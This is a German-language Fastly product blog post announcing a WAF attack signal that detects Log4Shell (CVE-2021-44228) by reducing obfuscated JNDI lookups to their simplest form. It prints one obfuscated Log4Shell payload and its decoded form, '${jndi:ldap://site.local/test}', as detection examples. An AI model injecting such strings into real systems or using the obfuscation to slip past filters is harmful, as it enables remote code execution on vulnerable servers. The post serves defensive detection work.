Zurück zum Blog

Folgen und abonnieren

Ankündigung: Angriffssignal LOG4J-JNDI jetzt verfügbar

Daniel Corbett

Senior Product Manager , Fastly

Hintergrund

Im Dezember 2021 erschütterte CVE-2021-44228, gemeinhin als Log4Shell bezeichnet, die Branche. Aufgrund der weit verbreiteten Verwendung der Log4j-Bibliothek war eine Vielzahl von Software-Tools gefährdet. Erschwerend kam hinzu, dass dieser Angriff auch Anwendungen betraf, die mit Logs interagierten. So konnten selbst Dienste gefährdet sein, auf die ein Angreifer keinen direkten Zugriff hat, wenn eine der Payloads Ihre Logging-Pipeline durchlief.

Binnen kürzester Zeit gelang es unseren Customer Security Operations Center (CSOC) und Security Research Teams, einen virtuellen Patch für alle unsere Kunden bereitzustellen. Wir richteten interne Störungsbehebungsteams ein und überwachten die Situation rund um die Uhr, um sicherzustellen, dass unsere Kunden von dieser kritischen Sicherheitslücke nicht betroffen waren. Nach ein paar Tagen veröffentlichten wir einige unserer Daten und Erkenntnisse über die verschiedenen Log4Shell-Angriffe. Beim Monitoring konnten wir beobachten, wie sich die Payload-Varianten veränderten, da die Angreifer Umgehungsmethoden entwickelt hatten, um eine Entdeckung durch gängige WAF-Muster zu vermeiden.

Erweiterung von SmartParse

Zwar nutzen alle unsere Angriffs- und Anomalie-Signale unsere SmartParse Technologie, doch manchmal implementieren wir virtuelle Patches auf Regex-Basis, wenn eine sofortige Reaktion erforderlich ist. Auf diese Weise können wir den Patch innerhalb von Minuten für unsere Kunden bereitstellen. Angesichts der schieren Anzahl neuer Varianten war uns jedoch klar, dass wir mit unserem leistungsfähigen SmartParse einen besseren Ansatz zur Erkennung dieser Angriffe bieten konnten.

Unsere Developer krempelten die Ärmel hoch und entwickelten eine Methode, die die Funktionalität von SmartParse erweitert und es ermöglicht, eine komplexe Log4Shell-Payload auf ihre einfachste Form zu reduzieren. Sehen wir uns das einmal am Beispiel einer beliebigen komplexen Payload an:

${${uPBeLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}${fGX:L:KhSyJ:-:}${E:o:wsyhug:LGVMcx:-l}${Prz:-d}${d:PeH:OmFo:GId:-a}${NLsTHo:-p}${uwF:eszIV:QSvP:-:}${JF:l:U:-/}${AyEC:rOLocm:-}/site.local/test}

Mit SmartParse können wir dies in die einfachste Form übersetzen:

${jndi:ldap://site.local/test}

Fortschrittliche Log4Shell-Erkennung und -Schutz

Der Einsatz von SmartParse bietet eine fortschrittliche und präzise Erkennung mit minimalen bis gar keinen False Positives und ohne die Verwaltung und Abhängigkeit von einem sich ständig erweiternden Regex-Muster.

Wir haben diese Funktion als neues Angriffssignal (LOG4J-JNDI) eingeführt, das wir zunächst im Rahmen unseres Programms Fastly Security Labs vorgestellt haben. Nachdem wir das Angriffssignal mehrere Monate lang beobachtet haben, geben wir nun offiziell die General Availability für alle Kunden bekannt. Das Signal bietet nicht nur eine bessere Erkennung als der Regex-basierte Abgleich, sondern ermöglicht es auch, Regeln auf Organisations- oder Unternehmensebene zu erstellen und so schnell eine Reaktionsstrategie für das gesamte Unternehmen zu implementieren.

Nächste Schritte

Als Kunde können Sie sich bei der Konsole unserer Next-Gen-WAF Konsole anmelden und sehen das neue LOG4J-JNDI-Angriffssignal sofort in Ihrem Anfragen-Feed. Standardmäßig ist es mit einer schwellenwertbasierten Blockierung aktiviert, die Sie an Ihre Bedürfnisse anpassen oder für die Sie bei Bedarf eine sofortige Blockierung implementieren können. 

Sollten Sie entweder keine oder eine ältere WAF verwenden, die einen Regex-Musterabgleich zur Erkennung von Log4Shell- oder OWASP-Injection-Angriffen nutzt, zeigen wir Ihnen gerne die Fastly Next-Gen-WAF (powered by Signal Sciences) und eine Alternative zur umständlichen Verwaltung und den False Positives, die mit herkömmlichen WAFs einhergehen. Weitere Informationen erhalten Sie von unseren Sicherheitsexperten.